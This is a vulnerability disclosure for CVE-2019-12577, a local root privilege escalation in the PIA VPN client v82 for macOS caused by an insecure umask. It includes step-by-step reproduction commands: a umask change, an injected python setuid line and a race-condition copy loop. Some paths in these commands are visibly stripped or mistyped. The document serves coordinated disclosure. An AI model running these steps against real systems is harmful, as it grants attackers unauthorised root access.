Skip to content
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

105 lines (57 sloc) 2.67 KB
Title: PIA macOS Privilege Escalation: Insecure umask
Author: Rich Mirch
CVE: CVE-2019-12577
Vendor Advisory: N/A
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for macOS could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA macOS binary openvpn_launcher.64 is setuid root. This binary creates
/tmp/ when executed. Because the file creation mask(umask) is not
reset, the umask value is inherited from the calling process. This value can be
manipulated to cause the privileged binary to create files with world writable
permissions. A local unprivileged user can modify /tmp/ during the
connect process to execute arbitrary code as the root user.
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment
OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82
Steps to reproduce
All steps are executed as a low privileged user.
Step 1 - set umask to 0000.
umask 0000
Step 2 - Verify the mask is 0000.
Step 3 - Execute openvpn_launcher.64. This will create /tmp/
with permissions of 777
# macOS
/Applications/Private\ Internet\ 2>/dv/null
Step 4 - Verify /tmp/ is word writable
ls -ld /tmp/
Step 5 - Create a copy of /tmp/
cp /tmp/ /tmp/
Step 6 - Insert arbitrary code in /tmp/
For this PoC we will execute the id command and pipe the output to wall. This
will display the uid/gid via a system broadcast message.
# Add this line to line #2 of the /tmp/
python -c 'import os;os.setuid(0);os.system("id|wall");’
Step 7 - Beat the race condition by continuously overwriting /tmp/
Put the job in the background. This is required because during the connection
process the script will be overwritten.
cd /tmp
while true; do cp;done &
Step 8 - Execute to open the PIA GUI client
/Applications/Private\ Internet\
Step 9 - Login and connect to the VPN
During the connection process /tmp/ will be executed as root and you should
see a wall message showing the output of id command with uid=0.
2018-12-16: Reported to vendor
2018-12-16: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83 however this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure
You can’t perform that action at this time.